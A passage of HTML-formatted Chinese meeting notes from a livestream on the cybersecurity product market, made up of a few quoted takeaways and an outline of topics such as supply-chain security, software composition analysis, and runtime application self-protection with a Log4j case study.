Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">的一个管控要求，单个工具的话，因为每一种安全能力都有自己的强项和劣势，所以我们还是推荐各个工具的综合利用才能发挥最大的作用。&#34;</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 甲方观点看SCA发展:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;网络安全正在发生重大变化,从早期的&#39;拳套&#39;(可有可无)到&#39;保镖&#39;(阻碍业务),再到未来的&#39;</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">免疫力</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#39;(与业务协同)。&#34;</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 安全厂商视角的SCA发展:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;AI技术带来的变化: 生成式AI可能被用于发现漏洞、执行攻击、制作恶意软件变种等,对</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">传统安全</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">防御体系构成挑战。&#34;</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">7. 安全产品采购与实施策略:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">前期</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">准备工作要充分,包括漏洞库设计、资产梳理等,这样可以提高后期运营的精准性。&#34;</span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(0, 0, 0);font-size: 12px;">*以下内容根据会议笔记整理，直播互动环节多，话题跳跃性强，我按照从宏观到微观、从问题到解决方案、从现状到未来趋势重新组织了直播的主题，错误疏漏难免，请以直播视频内容为准，部分口头内容由LLM总结要点，运行时安全有2个部分标注为LLM增补。</span>   <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">1 网络安全产品市场概况</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">1.1 中国网络安全产品用户调查报告</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">1.2 安全产品采购的挑战和策略</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">2 供应链安全的重要性与挑战</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">2.1 科技战凸显供应链安全重要性</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">2.2 开源组件风险及管理</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">软件资产的位置</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">供应链防火墙的思路</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">2.3 供应链安全的核心诉求</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">供应链风险治理就是优先级建议</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        -</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;"> 代码漏洞如何降噪</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">3 软件组件分析(SCA)技术深度解析</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">3.1 SCA技术概述及其局限性分析</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">SCA是入门工具</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">开源SCA</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">3.2 源码、二进制、运行时SCA比较</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">3.3 SCA与代码审计的区别与协同</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4 运行时应用自我保护RASP技术</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4.1 运行时安全原理</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">解释型语言</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">编译型语言</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4.2 有快速整改能力的RASP方案</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4.3 RASP案例剖析（以Log4j为例）</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4.4 RASP实施策略</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">4.5 RASP是安全平行切面的一个应用</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">5 供应链安全工具的发展与需求</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">5.1 核心诉求</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">5.2 用户体验</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 